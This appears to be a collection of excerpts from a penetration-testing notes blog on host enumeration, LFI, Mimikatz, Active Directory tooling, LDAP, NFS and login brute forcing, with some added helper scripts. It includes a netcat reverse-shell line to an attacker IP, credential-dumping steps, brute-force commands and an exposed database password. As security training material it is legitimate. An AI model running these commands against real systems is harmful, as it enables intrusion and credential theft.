-
See also the Web brute force post.
-
If your console is narrow, widen it at the beginning: stty rows 50 cols 200. Consider directly spawning a second reverse shell as a fallback: nc -e /bin/sh $attackerip 4444 & Basic enumeration of the host: id; groups; cat /etc/passwd; cat /etc/group; cat /etc/hosts; cat /etc/fstab; uname -a // Check for kernel exploits // ALSO search for kernel exploits by OS name! // If this…
-
dir General: Usual commands: Therefore: Remember to use dir /R /as /ah (cmd) or dir -Force (PowerShell) so that hidden and system files and alternate data streams show up. tree Start by creating a list of all directories and files. Download it. It’s way easier to look through in a local editor and it’s stored for the future as well. tree c:\ > C:\Windows\Temp\dsys\dirs.txt dir /s /R /as /ah c:\ > C:\Windows\Temp\dsys\files.txt (Download the files)…
-
General system enumeration Get general information about the OS: systeminfo Get the environment variables: set Enumerate stored (Credential Manager) credentials: cmdkey /list If the current system is not known yet, try to determine the version via one of the following files: Process enumeration: tasklist /V; tasklist /V | find "cmd.exe" // Search for a command; tasklist /V /fi "USERNAME eq NT…
-
Enumeration Check the certificate. Perform an SSL scan (sslscan). Go to Checklist 80 HTTP. Optional: if vulnerable to Heartbleed, use msf> use auxiliary/scanner/ssl/openssl_heartbleed. Don’t forget to set ACTION KEYS (or DUMP; see info); the default action only scans and does not extract memory.
-
Enumeration Mandatory: Check anonymous login. Try to create AND upload a file: mkdir test; put /tmp/test test. Check login with at least the following credentials: admin / admin, admin / password. Optional: Download everything with wget (wget -r ftp://$target/, with --ftp-user and --ftp-password if needed) and look for dotfiles! Check login with newly found users. Brute-force login. Make sure to check admin / admin and other usual combinations…
-
Automates Windows enumeration. Github page. Usage: Seatbelt.exe -group=all. Run Seatbelt.exe without arguments to see the possible parameters. Example: Seatbelt.exe OSInfo Processes. Remote: From another Windows system, Seatbelt can connect to a victim and run its checks there: Seatbelt.exe LogonSessions -computername=$victim -username=bob -password=bobber. Command aggregation: There are already some groups defined which perform multiple checks at once: Seatbelt.exe -group=system [-computername=...] Seatbelt.exe…
-
Source on Github. Creates screenshots from a list of URLs. A good way to get a fast overview of a new site. With nmap, use -oA file to also save the output as an XML file. EyeWitness can read this file via -x file and take screenshots of all of these sites: EyeWitness.py --web -x webservers.xml
-
The usual order: Network scan. Detect hosts for a domain (use SecLists): for sub in $(cat common-subdomains.txt); do host $sub.megacorpone.com; done Reverse lookup: Find domains for addresses: for ip in $(seq 155 190); do host 50.7.67.$ip; done | grep -v "not found" Zone transfer: Grab the zone file from a target domain's name server: host -a -l fraunhofer.de ns3.fraunhofer.de…
-
For reverse engineering. Device name / Content: /proc/$pid/maps shows the memory mapping of a process, including all loaded libraries. /proc/self/loginuid is the audit login UID of the current process (the UID of the user who logged in; 4294967295 if unset, e.g. for daemons). Read processes: If you can read /proc via an LFI: #!/bin/bash for i in {1..1024}; do echo $i; curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i; done Then, look in the /tmp/proc directory for files > 0 bytes. Read environment of…
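Once the loop above has pulled the cmdline files into a directory, the next step is reading them. /proc/<pid>/cmdline separates arguments with NUL bytes, so cat glues them together and $(cat ...) silently drops the NULs. The following helper is an added example, not part of the original post; it assumes one file per PID in the given directory, named after the PID (e.g. /tmp/proc/123), and the sample files in the test are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): list the non-empty cmdline files
# fetched through the LFI and print each command line readably.
# Assumed layout: $1 is a directory with one file per PID, named after the PID.

list_cmdlines() {
    dir="$1"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        [ -s "$f" ] || continue          # 0-byte file: no such PID or not readable
        pid=$(basename "$f")
        # /proc/<pid>/cmdline uses NUL as argument separator; tr turns each NUL
        # into a space (a plain "$(cat ...)" would drop the NULs), and sed strips
        # the trailing space left by the final NUL.
        cmd=$(tr '\0' ' ' < "$f" | sed 's/ $//')
        printf '%s\t%s\n' "$pid" "$cmd"
    done
}

# Number of PIDs that actually returned content: a quick sanity check that the
# LFI reaches /proc at all before reading the list by hand.
count_live() {
    list_cmdlines "$1" | wc -l | tr -d ' '
}
```

Run it as list_cmdlines /tmp/proc after the download loop; PIDs whose file is empty (non-existent processes, or ones the web server's UID may not read) are skipped.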
-
Try these resources if you can access files but not list them. http://pwnwiki.io/#!presence/windows/blind.md Cheat sheet 1 List: In Apache and probably other systems you can “travel over” non-existing files because the path is normalized (".." segments resolved) before the existence of the file is checked. Example: /test/test.txt/../../index.html will return in Apache the root’s index.html even if the test directory and…
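To see why the intermediate components do not have to exist, it helps to compare the two lookups side by side: a web server first collapses "." and ".." in the request path and only then touches the filesystem, whereas the kernel resolves every component in turn and fails on the first missing one. The normaliser below is an added example, not code from the original page; it mimics that URL-path normalisation in POSIX sh (the generalisation of the single Apache case given above), and the directory used in the test is constructed.

```shell
#!/bin/sh
# Added example, not from the original page: collapse "." and ".." the way a web
# server normalises a request path before it checks the filesystem. Because the
# normalisation runs first, components such as /test/test.txt never have to exist.

normalize_url_path() {
    path="$1"
    out=""
    # Split on "/"; "set -f" stops globbing of segments like "*".
    old_ifs="$IFS"; IFS='/'
    set -f; set -- $path; set +f
    IFS="$old_ifs"
    for seg in "$@"; do
        case "$seg" in
            ''|'.') ;;                      # empty ("//") and "." segments vanish
            '..')   out="${out%/*}" ;;      # pop the last kept segment, never above "/"
            *)      out="$out/$seg" ;;
        esac
    done
    printf '%s\n' "${out:-/}"
}

# The filesystem is stricter: a bogus intermediate directory makes the whole
# lookup fail even though the final target exists.
fs_exists() {
    [ -e "$1" ] && echo yes || echo no
}
```

normalize_url_path '/test/test.txt/../../index.html' prints /index.html, while test -e on the same string under the document root fails as long as test/ does not exist; that gap is exactly what the traversal-over-nonexistent-files trick relies on.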
-
Enumeration Mandatory Optional Tools
-
Windows keeps the credentials of logged-on users in memory in the Local Security Authority Subsystem Service (LSASS). On the filesystem, the SAM database stores the password hashes of local accounts. Use Mimikatz. Usage: Enable debug mode. This uses SeDebugPrivilege so that we are able to open and read other processes (LSASS): privilege::debug Try to elevate privileges to obtain SYSTEM user privileges:…
-
BloodHound analyzes and presents Active Directory data. SharpHound is the data collector which runs on a compromised domain-joined system. On the target: On the own system:
-
Collection of privesc scripts (PowerSploit). To start, upload PowerView.ps1 and: powershell -exec bypass PS> Import-Module .\PowerView.ps1 See the github site for all commands. General enumeration: powershell -exec bypass PS> . .\PowerUp.ps1 PS> Invoke-AllChecks Or: powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks" About users: Enumerate all users: Get-NetUser Enumerate all users which do not require Kerberos preauth (AS-REP roastable): Get-NetUser -PreauthNotRequired Returns…
-
See the Impacket site for a short description of all tools. Tip: On Kali, the scripts are installed as impacket-* commands. Enumeration without authentication: Determine the system architecture: getArch.py -target $target Return the listening RPC interface IDs: ifmap.py $target 135; rpcdump.py $target Enumeration with half authentication. Scenario: You have credentials for one AD user. Then, try to get all users for…
-
Checklist: A domain consists of the following elements: An object in AD may have a set of ACEs (Access Control Entries), which together form its ACL (Access Control List). An object’s ACEs can be retrieved in PowerShell (PowerView) with Get-ObjectAcl -Identity $object. The SCM (Service Control Manager) contains a database of installed services…
-
Ports: ldap 389/tcp, ldaps 636/tcp, global catalog ldap 3268/tcp, global catalog ldaps 3269/tcp. Enumerate without credentials: Nmap enumeration scans: nmap -n -sV --script "ldap* and not brute" $target Ldapsearch scan (anonymous bind): ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Connect to LDAPS / global catalog LDAPS: openssl s_client -connect $target:636 </dev/null; openssl s_client -connect $target:3269 </dev/null Search in the directory: ldapsearch -x -b…
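ldapsearch prints LDIF, and LDIF has two quirks that make naive grep over the output unreliable: long values are folded onto continuation lines that begin with a single space, and values that are binary, non-ASCII or start with a space are base64-encoded after a double colon. The helpers below are an added example, not code from the original post: ldif_attr unfolds and decodes one attribute, and ldif_asrep_roastable goes one step further on the same output and lists accounts whose userAccountControl has the DONT_REQ_PREAUTH bit (0x400000) set, the LDAP-side equivalent of Get-NetUser -PreauthNotRequired mentioned in the PowerView entry. The LDIF in the test is constructed; the attribute names are the standard AD ones.

```shell
#!/bin/sh
# Added example, not from the original post: extract attributes from ldapsearch
# (LDIF) output correctly. Feed it on stdin, e.g.:
#   ldapsearch -x -h $target -b "DC=BLA,DC=local" "(objectClass=user)" | ldif_attr sAMAccountName

ldif_unfold() {
    # A line starting with one space continues the previous line (RFC 2849).
    awk '
        /^ / { buf = buf substr($0, 2); next }
        { if (buf != "") print buf; buf = $0 }
        END { if (buf != "") print buf }
    '
}

ldif_attr() {
    attr="$1"
    ldif_unfold | while IFS= read -r line; do
        case "$line" in
            # "attr:: <base64>" is used for binary, non-ASCII or leading-space values
            "$attr:: "*) printf '%s' "${line#"$attr:: "}" | base64 -d; echo ;;
            "$attr: "*)  printf '%s\n' "${line#"$attr: "}" ;;
        esac
    done
}

# Accounts with UF_DONT_REQUIRE_PREAUTH (0x400000 = 4194304) in userAccountControl
# accept AS-REQs without pre-authentication (AS-REP roasting candidates).
# Entries in LDIF are separated by blank lines, so awk paragraph mode (RS="")
# yields one entry per record; awk lacks bitwise operators, hence int()/mod.
ldif_asrep_roastable() {
    awk -v mask=4194304 '
        BEGIN { RS = "" }
        {
            gsub(/\n /, "")                 # unfold continuation lines in this entry
            name = ""; uac = 0
            n = split($0, l, "\n")
            for (i = 1; i <= n; i++) {
                if (l[i] ~ /^sAMAccountName: /) name = substr(l[i], 17)
                if (l[i] ~ /^userAccountControl: /) uac = substr(l[i], 21) + 0
            }
            if (name != "" && int(uac / mask) % 2 == 1) print name
        }
    '
}
```

Typical use is ldapsearch ... | tee users.ldif followed by ldif_attr sAMAccountName < users.ldif to build a user list for password spraying, and ldif_asrep_roastable < users.ldif to pick the accounts worth trying with GetNPUsers.py.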
-
Connect from the command line: mongo 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace' Show databases: show dbs Switch to a database: use <db> Show all collections (“tables”): show collections Show all documents of a collection: db.<collection>.find() Add a document: db.products.insert( { item: "card", qty: 15 } ) Injections: Show all records of the current collection, assuming there is a WHERE-style filter on one field.…
-
Tools to detect: nmap -O, nmap-chronos. Tools to detect and validate: p0f. JS to list browser characteristics which could be sent back to an attacker via an AJAX request: /itsec/wp-content/uploads/2021/05/browser_detection.html Tools to impersonate: Against browser/JS-based fingerprinting, just tamper with the values the browser reports in about:config.
-
Enumeration Mandatory Optional On Windows
-
With Medusa (doesn’t seem to work with virtual hosts!): medusa -h 10.11.1.49 -u bethany -P Dog_Names_normalized.txt -M http -m DIR:/~Public -T 2 With ncrack (doesn’t seem to work with virtual hosts!): ncrack -vv --user bethany -P Dog_Names_normalized.txt http://10.11.1.49:9505 -m http:path=/~Public/ With metasploit: use the module auxiliary/scanner/http/http_login Virtual hosts: If Host headers are not supported: More
-
Download: https://github.com/droope/droopescan droopescan scan drupal -u http://$target/ -t 32 Or just install via pip pip install droopescan
-
https://tools.kali.org/exploitation-tools/commix Commix (COMMand Injection eXploiter) detects and exploits OS command injections automatically.
-
Directory enumeration Hints: General search nikto -host $victim gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 gobuster dir -u http://$target/ -p socks5://127.0.0.1:9991 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 HTTP_PROXY="socks4://127.0.0.1:9990/" gobuster dir -u http://$target/…
-
Display all exported NFS shares: showmount -e $target Normal mount: mount -t nfs $target:/home /mnt Mounting with nfspy: with the hide option it mounts and unmounts around each operation, so the victim cannot see the new connection via showmount: nfspy -o server=192.168.1.124:/home,hide,allow_other,ro,intr /mnt Mount via an SSH tunnel: ssh -N -L 3049:localhost:2049 user@hostname; mount -t nfs -o port=3049…
-
tcp/135, udp/135, and as (Microsoft) RPC over HTTP on tcp/593. Enumeration: Obtain general information: rpcinfo -p $target; rpcinfo -s $target Connect (hint: auto completion works; enum<tab> returns all enum commands): rpcclient -U "" $target Enumerate all RPC endpoints with one of the following options: python /usr/local/bin/rpcdump.py $target |…
-
Enumeration: Show currently logged-in users: finger @ip User enumeration: for username in $(cat cirt-default-usernames.txt); do finger $username@10.10.10.76 >> /tmp/finger; done Enumeration with Metasploit: msf5 > use auxiliary/scanner/finger/finger_users msf5 auxiliary(scanner/finger/finger_users) > set rhosts 10.10.10.76 rhosts => 10.10.10.76 msf5 auxiliary(scanner/finger/finger_users) > run Exploits: On very old systems, according to https://insecure.org/sploits_all.html, one could execute commands, e.g. with finger "|/bin/id@host"